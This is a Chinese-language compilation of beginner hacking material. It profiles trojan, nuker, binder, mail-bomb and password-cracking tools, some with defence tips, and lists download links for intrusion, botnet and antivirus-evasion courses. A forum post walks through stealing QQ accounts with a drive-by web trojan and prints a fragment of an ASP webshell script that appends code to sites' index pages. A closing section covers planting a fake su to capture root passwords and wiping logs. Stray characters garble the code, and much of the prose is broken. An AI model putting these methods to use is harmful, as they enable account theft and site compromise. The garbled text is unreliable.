菜鸟黑客教程2
- 格式:wps
- 大小:21.00 KB
- 文档页数:4
黑客菜鸟入门八种安全工具1、冰河冰河是最优秀的国产木马程序之一,同时也是被使用最多的一种木马说句心里话,如果这个软件做成规规矩矩的商业用远程控制软件,绝对不会逊于那个体积庞大、操作复杂的,但可惜的是,它最终变成了黑客常用的工具冰河的服务器端和客户端都是一个可执行文件,客户端的图标是一把瑞士军刀,服务器端则看起来是个没什么大不了的微不足道的程序,但就是这个程序,足以让你的电脑成为别人的掌中之物某台电脑执行了服务器端软件后,该电脑的端口就对外开放了,如果在客户端输入这台电脑的IP地址,就能完全控制这台电脑由于个人电脑每次上网的IP地址都是随机分配的,所以客户端软件有一个“自动搜索”功能,可以自动扫描某个IP段受感染的电脑,一旦找到,这台电脑就尽在黑客的掌握之中了由于冰河程序传播比较广泛,所以一般情况下,几分钟之内就能找到一个感染了冰河的受害者防御措施:首先不要轻易运行来历不明的软件,只要服务器端不被运行,冰河再厉害也是有力使不出,这一点非常重要;其次由于冰河的广泛流行,使得大多数杀毒软件可以查杀冰河,因此在运行一个新软件之前用杀毒软件查查是很必要的但由于该软件变种很多,杀毒软件如果不及时升级,难免会有遗漏,因此要保证您使用的杀毒软件病毒库保持最新用查杀木马软件如木马克星之类的也可以;安装并运行防火墙,如此则能相对安全一些2、可以利用系统的漏洞通过/IP协议向远程机器发送一段信息,导致一个错误,使之崩溃现象:电脑屏幕上出现一个蓝底白字的提示:“系统出现异常错误”,按键后又回到原来的状态,或者死机它可以攻击9X、、等系统并且可以自由设置包的大小和个数,通过连续攻击导致对方死机防御措施:不要轻易点击别人在论坛或聊天室告诉您的网址,那很可能是探测您的IP地址的;用写字板或其它的编辑软件建立一个文本文件,文件名为,内容如下:4[__\\ \\\]″″=″0″启动资源管理器,双击该文件即可;安装并运行防火墙 3、是基于的攻击的软件( ,网络基本输入输出系统),是一种应用程序接口(),作用是为局域网()添加特殊功能,几乎所有的局域网电脑都是在基础上工作的在我们的 95、99、或中,是和/IP捆绑在一起的这是十分危险的!但当我们安装/IP协议时,默认情况下和它的文件与打印共享功能也一起被装进了系统当运行时,你的后门打开了:因为不光允许局域网内的用户访问你的硬盘资源,上的黑客也能!正是利用了这一点防御措施:1) 检查是否出现在配置栏中打开控制面版,双击“网络”选项,打开“网络”对话框在“配置”标签页中检查己安装的网络组件中是否有如果没有,点击列表下边的添加按钮,选中“网络协议”对话框,在制造商列表中选择微软,在网络协议列表中选择点击确定,根据提示插入安装盘,安装2) 回到“网络”对话框,选中“拨号网络适配器”,点击列表右下方“属性”按钮在打开的“属性”对话框中选择“绑定”标签页,将除“/IP->网络适配器”之外的其它项目前复选框中的对勾都取消!3) 回到“网络”对话框,选中“/IP->拨号网络适配器”点击列表右下方“属性”按钮,不要怕弹出的警告对话框,点击“确定”在“/IP属性”对话框中选择“绑定”标签页,将列表中所有项目前复选框中的对勾都取消!点击“确定”,这时会警告你“尚未选择绑定的驱动器现在是否选择驱动器?”点击“否”之后,系统会提示重新启动计算机,确认4) 重新进入“/IP->拨号网络适配器”的“/IP属性”对话框,选定“”标签页,看到“通过/IP启用”项被清除了吧!连点两次“取消”退出“网络”对话框(不要点“确认”,免得出现什么意外)4、是一个功能强大的扫描器,速度奇快,探测中国台湾全部回应值小于MS的IP段仅用6个小时可以查看本机IP地址和域名,扫描一个IP段的所有在线主机以及其可探测到的端口号而且可以保存和导入所有已探测的信息防御措施:及时打补丁堵住漏洞微软的那些没完没了的补丁包是有用的,很多时候,这些补丁能有效堵住漏洞使我们的系统更安全一些尽管补丁包出现总会晚于漏洞的出现,但作为亡羊补牢的措施还是有必要的5、可以将指定的黑客程序捆绑到任何一个广为传播的热门软件上,使宿主程序执行时,寄生程序也在后台被执行当您再次上网时,您已经在不知不觉中被控制住了您说这个文件捆绑专家恐怖不?而且它支持多重捆绑实际上是通过多次分割文件,多次从父进程中调用子进程来实现的现象:几乎无危害:、、BO 常通过这种形式在上寄生传播如果有一天您收到一个不相识的人发来的不错的程序,请仔细检查一下,因为没准它是用捆绑了木马程序!防御措施:不要执行来历不明的软件,不要从不可靠的小站点上下载软件,任何新下载的程序在首次运行前,都要用最新的杀毒软件和查杀木马软件检查后才能使用另外,最好能知道一些常用软件的文件大小,一旦发现文件大小有变化尤其是有明显增大表现,这时就该请出我们的杀毒软件和查杀木马软件了6、邮箱终结者类似的邮箱炸弹很多,它们的原理基本一致,最根本的目标就是涨破您的邮箱,使您无法正常收发E-防御措施:要注意自己的网上言行,不要得罪人;不要轻易留下您的E-信箱地址,特别是较重要的E-信箱更不能随意让别人知道,以免给“有心人”机会;申请较大的邮箱,然后启用邮箱过滤功能,一般的网站都有这种服务对付这类炸弹只能如此消极防御了7、流光这是国人小榕的作品,当我首次使用这个软件时,我被它深深地震住了这个软件能让一个刚刚会用鼠标的人成为专业级黑客,它可以探测3、、、、、、、$$;上的各种漏洞,并针对各种漏洞设计了不同的破解方案,能够在有漏洞的系统上轻易得到被探测的用户密码流光对9X、、上的漏洞都可以探测,使它成为许多黑客手中的必备工具之一,一些资深黑客也对它青睐有加防御措施:由于它综合了多种扫描探测方式,所以很难防备,对付它必须及时打好各种补丁,同时还要使用防火墙防火墙推荐使用国产个人防火墙——天网天网是非常好的防火墙软件,可以有效阻挡各种攻击,有非常灵活的规则设置规则?什么是规则?跟您直说了吧,规则是一系列的比较条件和一个对数据包的动作,就是根据数据包的每一个部分来与设置的条件比较,当符合条件时,就可以确定对该包放行或者阻挡明白了吧?通过合理的设置规则就可以把有害的数据包挡在你的机器之外如果您不熟悉网络,最好不要调整它,您可以直接使用天网帮您设计的规则如果您熟悉网络,就可以非常灵活的设计合适自己使用的规则虽然天网有些过于敏感,经常对一些正常的文件传送报警,但这并不妨碍这个软件成为优秀的防火墙软件天网免费注册,即使不注册也不影响使用8、溯雪还是小榕的作品该软件利用、对免费信箱、论坛、聊天室进行密码探测的软件密码探测主要是通过猜测生日的方法来实现,成功率可达60%-70%溯雪的运行原理是通过提取、页面表单,搜寻表单运行后的错误标志,有了错误标志后,再挂上字典文件来破解信箱密码用溯雪来探测信箱密码真的是很容易,由于许多人对密码的设置采用了自己的生日或常用英文单词等较简单的方式,这给溯雪留下了很大的施展空间我曾用自己的信箱做过试验,采用生日作为密码,溯雪只用了不到3分钟就成功的破解出了我的密码!要知道我用的字典很大,若字典再小些,会更快的!防御措施:首先不要轻易暴露自己的信箱地址和论坛、聊天室的用户名,以免引起“有心人”注意;其次把您的密码设置复杂一些,不要设置成纯数字或纯字母,更不能少于7位,否则真的很危险可以将密码设置成数字与字母相结合型,并且长度大于7位以上,如设置为这种样式:g19o79o09d19这个密码是英文单词和生日的组合,记忆容易,长度又很长,是很难破解的;再次要经常更换密码,一个密码使用时间不能太长;最后一点,最好各个信箱密码都不同,以免被人一破百破。
黑客教程链接大放送黑客教程链接大放送。
可能有部分网址已经失效,但是大部分都还可以的。
100G黑客VIP教学教程!全部学完你就是高手.txt: /file/187676333389抓鸡系列教程19课.txt: /file/18767636discuz的教程,需要的进来,很全.txt: /file/18767638 hd黑盾10天精通注册表培训教程.txt: /file/18767640 YES黑客联盟Dreamweaver网页设计系列.txt: /file/18767642YES黑客联盟内部汇编教程(第一部分).txt: /file/18767645YES黑客联盟小艾入侵(1-9).txt: /file/18767650不怕网警找上门之安全入侵教程.txt: /file/18767653 残血VIP_QQ空间FD模块制作教程.txt: /file/18767656 从基础免杀到菜鸟进阶再到精品VIP高级教程.txt: /file/18767660大量教程黑客教程,将近上百套全部打包.txt: /file/18767662道德网安免杀系列.txt: /file/18767663独特技术论坛VIP入侵教程.txt: /file/18767665饭客论坛VIP内部全套教程.txt: /file/18767668飞飞老师的所有教程.txt: /file/18767676鬼舞安全网网络教程集合.txt: /file/18767679黑客动画吧Web入侵班.txt: /file/18767682黑客基地、黑鹰基地、黑客防线、黑客动画吧计算机教程汇总.txt: /file/18767683黑客基地VIP封包视频教程.txt: /file/18767684黑客基地VIP会员区视频教程.txt: /file/18767687黑客基地VIP密码破解教程.txt: /file/18767689黑鹰VIP飞飞完完全全学会抓肉鸡.txt: /file/18767691 华夏黑客(77169)VIP培训教程合辑上下部.txt: /file/18767695计算机维护与维修.txt: /file/18767697金旋2010建站培训.txt: /file/18767698蓝客QQ攻系列教程1-12课时.txt: /file/18767700两天学会做网站.txt: /file/18767701吾爱安全网软件安全系列.txt: /file/18767702夜莺VIP新手动画教程.txt: /file/18767703针对游戏挂中按键精灵的入门系统教程,8课.txt: /file/18767704中华隐士联盟VIP课程-(VB编程1-23课).txt: /file/18767708中华隐士联盟VIP课程-(VB编程24-40课).txt: /file/18767709/file/18763459]安全中国网站脚本安全检测培训班/file/18763463]暗月渗透小组系列入侵渗透教程/file/18763465]各大黑客名站入侵渗透教材大全/file/18763473]华夏黑客联盟脚本入侵班21课/file/18763475]入侵教程打包/file/18763478]新世纪网VIP_入侵高级班/file/18763480]缘分技术论坛入侵系列/file/18763482]2012年2月最新一套免杀教程/file/18763484]黑防提权班/file/18763486]黑客入门到精通/file/18763489]黑麒麟入侵检测系列/file/18763490]黑手论坛VIP 全套教程/file/18763492]综合黑客工具大全/file/18762652]30天打造黑客程序编写高手。
菜鸟教程~~0 m7 Y6 M& t1 C8 c本帖隐藏的内容需要回复才可以浏览我的工具: ) {/ a; _" {1 r) ?, @/ `: n. X' e1,免杀的ms0614网马.(自己多看点文章,也要做免杀)2,盗Q黑侠最新版3,空间(我用的webshell) ' O) t3 j+ L* u4 u5 `4,CQQtools.(查看QQ资料的)先配置好盗Q黑侠的服务端,配置盗Q黑侠的时候,选择选用asp收信. . X) r- ]" r" Tasp收信程序代码: 5 N: M) n1 r: x G, C! ^5 Q/ j2 f/ W% f$ U' W其中的XXX.txt一定要修改名字,防止别人探测到默认的名字.否则你的成果就被别人拿走了哦. % J. L! W. q/ ?4 [; I0 R然后把盗Q黑侠的服务端传到你的空间里面去.配置好ms0614网马.MS0614网马最新免杀代码(忍痛放出): + }9 Y. @! _) z$ K1 {" M! q a6 ~ P0 k3 a1 K+ S3 B, i1 ?$ K; J x. Y) x* m4 d' ~网站为您报时!( g6 m! A; B" s8 p0 O这个代码,我加入了IE的一个小漏洞,别人打开这个htm的时候,点查看源文件,是看不到代码的.不过,你用2 C$ t. D7 ^4 |6 HIE标准按钮里面的用记事本打开,还是: u' m4 F* Y( R q- V6 M8 D可以看到的.把里面的/heng.exe修改成你木马的地址. * }( V$ s: ?& J然后开始挂马,大家干hack这么多年,,相信手上都多少都应该都点webshell把,,把他们挂到上去. 9 Z! r8 q" d" |) A0 w9 e挂马的代码:这里推荐2款工具. * a% h7 t: C6 a第一款:4 j( P3 r+ f' z# V. ^9 p5 I- W# n) K$ P, c0 ^7 ]; h/ n, Y9 G m. A; p u<**** http-equiv="Content-Type" c> & n9 i% B: F; o0 S% o( B# }4 N& }% f4 f6 v7 e3 X& z<% 6 x& x# V& N4 |# a* S2 n/ SASP_SELF=Request.ServerVariables("PA TH_INFO") $ k- s% ]6 Y5 K. a' q# m# \ s=Request("fd")ex=Request("ex") # I$ X/ w% K J* s5 h7 i" qpth=Request("pth") 8 Z( T% A* Q- }) z8 r9 Wnewcnt=Request("newcnt") * R0 h1 h' k! M; T/ J/ VIf ex"" AND pth"" Thenselect Case ex * o& Q1 `; c: Q& O% _5 p8 A$ E' H/ [Case "edit"CALL file_show(pth)Case "save"CALL file_save(pth)End selectElse " d7 A8 P+ R5 {$ x%>6 i7 {4 S9 B7 L" u9 V1 k<FORM action="" method=post>8 ^* N4 ~, h, m* E7 S$ h8 m0 TFOLDER (ABSOLUTE PATH): q/ ~0 p. V8 O+ V2 @; J2 x) \) a) Y R+ B) f3 C: [1 \2 ]7 W& b% F- C- F, l% y2 B8 ^) H& @4 L% E) z/ v' H N<% , A( d7 T; j: b( b" Z& dFunction IsPattern(patt,str)Set regEx=New RegExp 0 o( T2 j2 n* T$ v6 _' lregEx.Pattern=pattregEx.IgnoreCase=TrueretVal=regEx.Test(str) & { Y- J0 q6 E' wSet regEx=Nothing / ?3 l6 V6 ~& XIf retVal=True Then ! J6 S/ ]) ~1 q. X5 a- e! nIsPattern=TrueElse 9 d7 i- s$ {9 RIsPattern=False 5 {/ W0 Z3 B9 _: Z# IEnd If 7 _( Y; S- x7 ?6 |4 M2 _- {End FunctionIf IsPattern("[^ab]{1}:{1}([url=file://\\|\/)]\\|\/)",s[/url]) Thensch s * E4 i. ]% I& m yElse : T( D0 B$ T5 W" h! IIf s"" Then Response.Write "Invalid Agrument!"End If * e1 }! T5 Y, k$ ?2 pSub sch(s) ; C7 D+ m1 M1 d: ~# FoN eRrOr rEsUmE nExTSet fs=Server.createObject("Scripting.FileSystemObject") $ U7 [: r+ p: P/ P4 m1 w4 FSet fd=fs.GetFolder(s) 5 J" s9 ` x2 ~; i" tSet fi=fd.FilesSet sf=fd.SubFoldersFor Each f in fi . Z- _" v/ P5 q% h# yrtn=f.Path 0 S, f! [' @5 _& m8 x+ X6 V; dstep_all rtnNext 5 D4 _1 e9 o, \9 FIf sf.Count0 ThenFor Each l In sfsch lNextEnd If 2 \4 x0 [, E0 @# ]0 q n {& n+ a: bEnd SubSub step_all(agr) X$ i6 ^8 z7 i4 C; A- l/ \* P9 e: cretVal=IsPattern("([url=file://\\|\/)(default|index)\.(htm|html|asp|php|jsp)\b]\\|\/)( c$ a( A! T0 c* f' Z$ H : o; V% O" O" U% o" V' y* y(default|index)\.(htm|html|asp|php|jsp)\b",agr[/url])If retVal Thenstep1 agr : m: o/ @1 ?) y; ?( J2 E; \step2 agrElseExit SubEnd IfEnd Sub 6 F5 w/ C8 t5 g& z/ \( x3 ?* K3 Z& p%>[url=/<%=ASP_SELF%][/url]4 n( `& W( b- c+ u: [; V0 N1 J1 n l" g" h7 l5 Z. m- @3 S1 b<%Sub step2(str2)addcode=""Set fs=Server.createObject("Scripting.FileSystemObject")isExist=fs.FileExists(str2)If isExist Then - f. {( w- B3 B c% t; M) ^8 y4 f& eSet f=fs.GetFile(str2)Set f_addcode=f.OpenAsTextStream(8,-2)f_addcode.Write addcode 5 l& W V/ A4 y1 { i: G% d, _f_addcode.Close + H1 n$ Z7 }( F% s0 wSet f=Nothing # S0 P% G8 `" k) y9 rEnd If 7 a; K/ V+ }6 f, p; x8 X# TSet fs=NothingEnd Sub ' B+ j: d8 l3 `7 h1 Q%>! v2 U5 X1 X7 [% z9 wFILE:<FORM action="" method=post><%=cnt%><INPUT type=hidden value="" name=pth> $ p3 M2 y2 d: t: x: w- F# V" s9 O% H+ Y M! U+ p- P" U1 {6 U" n, \# t' r: b1 T. L; \" v" t2 ]" X) |; l$ G" A( ]" {- ~( y% LTHE FILE IS NOT EXIT OR HA VE deleteD.: b# r, \5 j* z- d, Y. H* }5 I% E! O! |" w+ ?$ R0 V这是一个webshell下自动挂马程序,当然其中也有我们需要修改的地方。
下载地址:/jc/1小时入侵上百网站.rar入侵变态网站下载地址;/jc/入侵变态网站.rar拿Webshell绝杀技巧下载地址;/jc/拿Webshell绝杀技巧.rar游戏箱子破解详解下载地址:/jc/游戏箱子破解详解.rar捆梆压缩让你抓鸡更轻松下载地址:/jc/捆梆压缩让你抓鸡更轻松.rar轻松跨站拥有整个服务器权限下载地址;/jc/轻松跨站拥有整个服务器权限.rarcookie欺骗的综合应用下载地址:/jc/cookie欺骗的综合应用.rar1433手动抓鸡教程/d/97a51be ... 803ca4be9379d4a0f03阿凡提IT吧培训班简单拿站/d/40a1681 ... 5a508db1c411cf7a600建立超级隐藏后门录像和工具下载地址:/jc/建立超级隐藏后门录像和工具.rar突破限制拿WEBSHELL下载地址:/jc/突破限制拿WEBSHELL.rar指定IP单机电脑入侵下载地址:/jc/指定IP单机电脑入侵.rar教您在软件上捆绑木马获取大量肉鸡下载地址:/viewthread.php?tid=6511&extra=page%3D1oblog4.0-4.5后台拿shell演示/jc/oblog4.0-4.5后台拿shell演示.rar_______________________________________________________________________________ ___黑客基地VIP教程1-104动画视频下载C语言第一课/thread-5919-1-1.htmlC语言第二课/thread-6095-1-1.htmlC语言第三课/thread-6132-1-1.htmlC语言第四课/thread-6263-1-2.htmlC语言第五课和第六课综合为一讲/thread-6324-1-1.htmlC语言第七课/thread-6325-1-2.htmlC语言第八课/thread-6359-1-1.html第一课配置安全的个人计算机/vipsoft/vipteacher/anquan0922.zip 第二课SQL注入技术实例讲解/vipsoft/vipteacher/sqlru0922.zip 第三课手工清除QQ连发消息病毒/vipsoft/vipteacher/qqav0927.zip 第四课配置最流行的WEB服务器/vipsoft/vipteacher/iis1010.zip第五课组建DNS和DHCP服务器/vipsoft/vipteacher/dnsdhcp.zip第六课模拟黑客攻击和安全防护/vipsoft/vipteacher/hacksec.zip第七课个人计算机安全终极配置/vipsoft/vipteacher/psec.zip第八课如何查杀木马/vipsoft/vipteacher/muma1107.zip 第九课如何查杀木马利用工具/vipsoft/vipteacher/tools1107.zip 第十课入侵前的准备/vipsoft/vipteacher/ruqin.zip第十一课网络地址转换NA T/vipsoft/vipteacher/nat1122.zip第十二课组建虚拟网络VPN/vipsoft/vipteacher/vpn.zip第十三课漏洞利用漏洞(一)/vipsoft/vipteacher/iisexp.zip第十四课配置黑客工具/vipsoft/vipteacher/FantasyX.zip 第十五课MsSql Server安装和配置/vipsoft/vipteacher/sql.zip第十六课Win2000入门到精通(一)/vipsoft/vipteacher/win2000.zip第十七课Win2000入门到精通(二)/vipsoft/vipteacher/w2kset.zip第十八课Windows 2000高级操作/vipsoft/vipteacher/network.zip第十九课Win2000的化石(一)/vipsoft/vipteacher/ad.zip第二十课Win2000的化石(二)/vipsoft/vipteacher/winad.zip第二十一课Windows 2000安全配置/vipsoft/vipteacher/w2ksec.zip第二十二课溢出入侵教程/vipsoft/vipteacher/mydoor.zip第二十三课后门的使用方法/vipsoft/vipteacher/backdoor.zip第二十四课漏洞利用/vipsoft/vipteacher/telne.zip第二十五课建立自己的PHP论坛/vipsoft/vipteacher/php.zip第二十六课DOS系统基础讲解/vipsoft/vipteacher/20040313.zip第二十七课Windows系统进程优化与系统安全加固/vipsoft/vipteacher/20040320winyh.zip第二十八课入侵后日志的清除(一)/vipsoft/vipteacher/log.zip第二十九入侵后的日志清除(二)/vipsoft/vipteacher/clearlog.zip第三十课黑基会员学习方法(必学-非常重要)/vipsoft/vipteacher/20040410fangfa.zip第三十一课入侵后如何上传后门/vipsoft/vipteacher/upl.zip第三十二课注册表应用教程/vipsoft/vipteacher/reg.zip第三十三课代理Proxy服务器技术学习一/vipsoft/vipteacher/20040508proxy.zip第三十四课代理Proxy服务器技术学习二/vipsoft/vipteacher/20040515proxy2.zip第三十五课Windows组策略配置详解/vipsoft/vipteacher/20040522zcl.zip第三十六课聊天室搭建及常用攻防技巧/vipsoft/vipteacher/20040529chat.zip第三十七课个人电脑与网站服务器安全/vipsoft/vipteacher/20040612pcserver.zip第三十八课让电脑百毒不侵防火墙规则设置+杀毒软件+QQ病毒手动分析查杀/vipsoft/vipteacher/20040619fsq.zip第三十九课UNICODE编码漏洞+后门隐藏设置与防范/vipsoft/vipteacher/20040626unicode.zip第四十课DDOS攻击安全分析与实例演示/vipsoft/vipteacher/20040703ddos.zip第四十一课FTP服务器的建立配置和安全/vipsoft/vipteacher/20040711ftp.zip第四十二课零起点培训如何破解软件和制做注册机/vipsoft/vipteacher/200407170pj.rar第四十四课破解高手--实战查壳脱壳制作破解注册机最详细的教程/vipsoft/vipteacher/20040801teach.rar第四十五课SQL注入入侵网站实战教程程/vipsoft/vipteacher/20040807sqlzr.zip第四十六课Linux单操作系统安装(Linux第1课)/vipsoft/vipteacher/20040815linuxtest.zip第四十七课Linux基础入门简介(Linux第2课)/vipsoft/vipteacher/20040821linuxdiyi.zip第四十八课VmwareGSX S2.5虚拟机安装与使用详解/vipsoft/vipteacher/usevmware.zip第四十九课Linux字符+图形界面安装配置(Linux第3课)/vipsoft/vipteacher/20040828linuxsetup.zip第五十课Linux与Windows双系统安装(Linux第4课)/vipsoft/vipteacher/20040904lw2.zip第五十一课Linux桌面介绍与网络上网配置(Linux第5课)/vipsoft/vipteacher/20040911linuxzn.zip第五十二课Linux文件系统详细讲解(Linux第6课)/vipsoft/vipteacher/20040918linuxfile.zip第五十三课Linux文件系统常用命令讲述(Linux第7课)/vipsoft/vipteacher/20040925linuxcmd.zip第五十四课Linux目录文件操作命令讲解(Linux第8课)/vipsoft/vipteacher/20040926linuxdir.zip第五十五课经典的linux下VI编辑器(Linux第9课)/vipsoft/ ... 1016linuxviedit.rar第五十六课linux下GRUB配置方法(Linux第10课)/vipsoft/ ... linuxGRUBconfig.rar第五十七课Linux下压缩文件使用教程(Linux第11课)/vipsoft/vipteacher/20041029linuxrar.rar第五十八课Linux下压缩包安装使用(Linux第12课)/vipsoft/vipteacher/20041106linuxrar.rar第五十九课Vmware4.5虚拟机安装与使用/vipsoft/bigsoft/VMware.zip第六十课Linux下GRUB问题讲解(Linux第13课)/vipsoft/vipteacher/20041113linux18.rar第六十一课Linux用户管理详细配置(Linux第14课)/vipsoft/vipteacher/20041114linux19.rar第六十二课Linux中进程管理详解(Linux第15课)/vipsoft/vipteacher/20041120linux20.rar第六十三课Linuxlinux下的日志文件(Linux第16课)/vipsoft/vipteacher/20041127linux.rar第六十四课Linux下程序shell编程简介(Linux第17课)/vipsoft/vipteacher/20041205linux.rar第六十五课Linux下的网络基础配置(Linux第18课)/vipsoft/vipteacher/200411211inux18.rar第六十六课Linux下的DHCP服务器(Linux第19课)/vipsoft/vipteacher/20041217inux19.rar第六十七课Linux下的samba服务器(Linux第20课)/vipsoft/vipteacher/20041225inux20.rar第六十八课Linux下的samba服务器2(Linux第21课)/vipsoft/vipteacher/20050101inux21.rar第六十九课破解注册软件视频教程/vipsoft/vipteacher/20050102pojie.rar第七十课linux下DNS服务器设置详解1(Linux第22课)/vipsoft/vipteacher/20050108inux22.rar新世纪网安基地免费VIP教程/donghua/200607/hackgf/lesson1.rar/donghua/200607/hackgf/lesson2.rar/donghua/200607/hackgf/lesson3.rar/donghua/200607/hackgf/lesson4.rar/donghua/200607/hackgf/lesson5.rar/donghua/200607/hackgf/lesson6.rar/donghua/200607/hackgf/lesson7.rar/donghua/200607/hackgf/lesson8.rar/donghua/200607/hackgf/lesson9.rar/donghua/200607/hackgf/lesson10.rar/donghua/200607/hackgf/lesson11.rar/donghua/200607/hackgf/lesson12.rar/donghua/200607/hackgf/lesson13.rar/donghua/200607/hackgf/lesson14.rar/donghua/200607/hackgf/lesson15.rar/donghua/200607/hackgf/lesson16.rar/donghua/200607/hackgf/lesson17.rar/donghua/200607/hackgf/lesson18.rar/donghua/200607/hackgf/lesson19.rar/donghua/200607/hackgf/lesson20.rar/donghua/200607/hackgf/lesson21.rar/donghua/200607/hackgf/lesson22.rar/donghua/200607/hackgf/lesson23.rar/donghua/200607/hackgf/lesson24.rar/donghua/200607/hackgf/lesson25.rar====================================================================== =============一个老鸟的经典收藏经典网址小西的黑客教程(菜鸟版)/down/show.asp?id=213&down=1阿凡提IT吧(亚洲情报局下属网站)/index.php流光教程电子版/down/show.asp?id=34&down=1三陀工作室整理的delphi和黑客技巧1.5 /hack/delphitechv1.5.chm终端服务的电子书/wawa/tools/termsrv.zipncc制作的超级菜鸟黑客速成/download/show.php?id=2136溯雪光影小榕论坛精华集/banana/tools/netxeyes.chm安全焦点文档精华/banana/tools/xfocus_doc.rar鹰派的网络经典教材/forum-117-1.htmlrick的unix教材/down/show.asp?id=153&down=1幻影旅团团长:刺写的黑客教程/rije/banana/tools/hy.rar菜牛兄写的汉化与破解软件教程/rije/banana/tools/niu.rar单机安装web服务,ftp服务,imail邮件服务,和超级雷傲论坛全攻略/banana/tools/web.chm雾中鸟的《系统网络入侵方法小结》/down/show.asp?id=114&down=1傲气雄鹰的教程/轰天炮写的黑客入门/rije/banana/tools/htp.rar《黑客攻防指南》第一期/forum-121-1.html小铭写的《网络最菜黑客指南》/download/show.php?id=1808&down=1黑客防线全站教程/banana/tools/banana_01.rar菜鸟宝典/down/cainiao.zip黑客基础教材论坛成员沉睡不醒收集制作/down/show.asp?id=241&down=1小西的黑客教程(菜鸟版)/forum-171-1.html流光教程电子版/down/show.asp?id=34&down=1三陀工作室整理的delphi和黑客技巧1.5 /hack/delphitechv1.5.chm终端服务的电子书/wawa/tools/termsrv.zipncc制作的超级菜鸟黑客速成/forum-176-1.html溯雪光影小榕论坛精华集/banana/tools/netxeyes.chm安全焦点文档精华/banana/tools/xfocus_doc.rar鹰派的网络经典教材/down/show.asp?id=63&down=1rick的unix教材/down/show.asp?id=153&down=1幻影旅团团长:刺写的黑客教程/rije/banana/tools/hy.rar菜牛兄写的汉化与破解软件教程/rije/banana/tools/niu.rar单机安装web服务,ftp服务,imail邮件服务,和超级雷傲论坛全攻略/banana/tools/web.chm雾中鸟的《系统网络入侵方法小结》/down/show.asp?id=114&down=1傲气雄鹰的教程/轰天炮写的黑客入门/rije/banana/tools/htp.rar《黑客攻防指南》第一期/forum-208-1.html小铭写的《网络最菜黑客指南》/download/show.php?id=1808&down=1黑客防线全站教程/banana/tools/banana_01.rar菜鸟宝典/down/cainiao.zip黑客基础教材论坛成员沉睡不醒收集制作/down/show.asp?id=241&down=1菜鸟来看看--必定有收益!(强力推荐)很早就想总结一下新手常见的问题和回答了。
黑客入门教程黑客入门教程黑客(Hacker)一词原指精通电脑技术的高手,后来逐渐演化为指掌握计算机系统的安全漏洞并进行攻击的人。
然而,在现实生活中,黑客并不一定都是坏人。
一些安全研究人员也自称为“白帽黑客”,他们致力于发现并修复系统漏洞,提高计算机系统的安全性。
黑客的技能包括计算机编程、系统安全、网络通信等方面的知识。
以下是一个简单的黑客入门教程,帮助初学者理解黑客技术的基本知识和操作步骤。
1. 学习编程语言:作为一个黑客,掌握至少一种编程语言是必要的。
常用的编程语言有Python、C++、Java等。
使用这些语言,你可以更好地了解计算机的工作原理,并编写自己的程序。
2. 了解计算机网络:黑客需要了解计算机网络的基础知识,包括IP地址、端口、HTTP协议、TCP/IP协议等。
这些知识将帮助你更好地理解网络通信过程,并进行网络攻击或安全防护。
3. 学习操作系统:操作系统是黑客攻击的目标之一,也是黑客进行攻击或保护的平台。
学习操作系统,比如Windows、Linux等,可以帮助你理解系统的工作原理,并发现系统漏洞。
4. 学习网络安全:网络安全是黑客技能的核心。
学习网络安全知识,包括密码学、防护机制、入侵检测等,将帮助你提高系统的安全性,并防范他人的黑客攻击。
5. 使用合法的渠道学习:黑客技术涉及到很多法律、道德和道义问题。
为了避免违法行为,你应该使用合法的渠道学习黑客技术,比如阅读相关书籍、参加网络安全培训班等。
6. 实践并分享经验:实践是掌握黑客技术的最好方式。
你可以自己创建一个安全测试环境,模拟攻击和防御的场景,并通过实践来提升自己的技能。
同时,你也可以与其他黑客交流和分享经验,从中获取更多的知识。
总之,要成为一名合格的黑客,需要全面掌握计算机技术、网络安全和编程等方面的知识。
同时,要始终保持道德和法律意识,遵守法律规定,将技术用于正当的目的,为保护网络安全做出贡献。
当然大多半进击成功的典范照样应用了体系软件本身的破绽.造成软件破绽的重要原因在于编制该软件的程序员缺乏安然意识.当进击者对软件进行非正常的挪用要求时造成缓冲区溢出或者对文件的不法拜访.个中应用缓冲区溢出进行的进击最为广泛,据统计80%以上成功的进击都是应用了缓冲区溢出破绽来获得不法权限的.关于缓冲区溢出在后面用专门章节来作具体说明.无论作为一个黑客照样一个收集治理员,都须要控制尽量多的体系破绽.黑客须要用它来完成进击,而治理员须要依据不合的破绽来进行不合的防御措施.懂得最新最多的破绽信息,可以到诸如Rootshell(www.rootshell.com).Packetstorm (packetstorm.securify.com).Securityfocus (www.securityfocus.com)等网站去查找.2.权限的扩大体系破绽分为长途破绽和当地破绽两种,长途破绽是指黑客可以在此外机械上直接应用该破绽进行进击并获取必定的权限.这种破绽的威逼性相当大,黑客的进击一般都是从长途漏敞开端的.但是应用长途破绽获取的不必定是最高权限,而往往只是一个通俗用户的权限,如许经常没有办法做黑客们想要做的事.这时就须要合营当地破绽来把获得的权限进行扩大,经常是扩大至体系的治理员权限.只有获得了最高的治理员权限之后,才可以做诸如收集监听.打扫陈迹之类的工作.要完成权限的扩大,不单可以应用已获得的权限在体系上履行应用当地破绽的程序,还可以放一些木马之类的诱骗程序来套取治理员暗码,这种木马是放在当地套取最高权限用的,而不克不及进行长途控制.例如一个黑客已经在一台机械上获得了一个通俗用户的账号和登录权限,那么他就可以在这台机械上放置一个假的su程序.一旦黑客放置了假su程序,当真正的正当用户登录时,运行了su,并输入了暗码,这时root暗码就会被记载下来,下次黑客再登录时就可以应用su变成root了.进击的善后工作1.日记体系简介假如进击者完成进击后就连忙分开体系而不做任何善后工作,那么他的行踪将很快被体系治理员发明,因为所有的收集操纵系同一般都供给日记记载功效,会把体系上产生的动作记载下来.所以,为了自身的隐蔽性,黑客一般都邑抹失落本身在日记中留下的陈迹.想要懂得黑客抹失落陈迹的办法,起首要懂得罕有的操纵体系的日记构造以及工作方法.Unix的日记文件平日放鄙人面这几个地位,依据操纵体系的不合略有变更/usr/adm——早期版本的Unix./Var/adm新一点的版本应用这个地位./Varflort一些版本的Solaris. Linux BSD. Free BSD应用这个地位./etc,大多半Unix版本把Utmp放在此处,一些Unix版本也把Wtmp放在这里,这也是Syslog.conf的地位.下面的文件可能会依据你地点的目次不合而不合:acct或pacct-一记载每个用户应用的敕令记载.accesslog重要用来办事器运行了NCSA HTTP办事器,这个记载文件会记载有什么站点衔接过你的办事器.aculo保管拨出去的Modems记载.lastlog记载了比来的Login记载和每个用户的最初目标地,有时是最后不成功Login的记载.loginlog一记载一些不正常的L0gin记载.messages——记载输出到体系控制台的记载,别的的信息由Syslog来生成security记载一些应用 